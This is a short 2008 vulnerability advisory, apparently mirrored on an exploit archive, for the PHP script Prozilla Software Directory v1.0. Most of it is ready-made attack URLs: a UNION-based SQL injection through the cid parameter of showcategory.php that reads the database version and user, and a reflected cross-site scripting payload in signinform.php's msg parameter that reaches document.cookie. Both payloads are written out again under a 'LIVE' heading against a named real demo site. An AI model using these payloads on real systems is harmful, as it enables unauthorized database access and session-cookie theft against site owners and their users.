id: 4102
date: 11/06/2008
title: Prozilla Software Directory (XSS/SQL) Multiple Vulnerabilities
author: G4N0K
cves: 

==============================================================
Prozilla Software Directory (XSS/SQL) Multiple Vulnerabilities
==============================================================


==============================================================================
	Software Directory v1.0 (SQL/XSS) Remote SQL Vulnerability
==============================================================================

	[»] Script:             [ Software Directory v1.0 ]
	[»] Language:           [ PHP ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 06.11.2008 ]
	[»] Founder:            [ G4N0K ]


===[ XPL ]===

	[ SQLi ]
	[»] http://localhost/[path]/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--


	[ XSS ]
	[»] http://localhost/[path]/signinform.php?msg="><script>alert(document.cookie)</script>




===[ LIVE ]===
	
	[ SQLi ]
	[»] http://demo.turnkeyforms.com/software-directory/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--

	[ XSS ]
	[»] http://demo.turnkeyforms.com/software-directory/signinform.php?msg="><script>alert(document.cookie)</script>

	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 
	[»] Hussain-X 

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit(); //EoX
===============================================================================



#  0day.today [2023-03-22]  #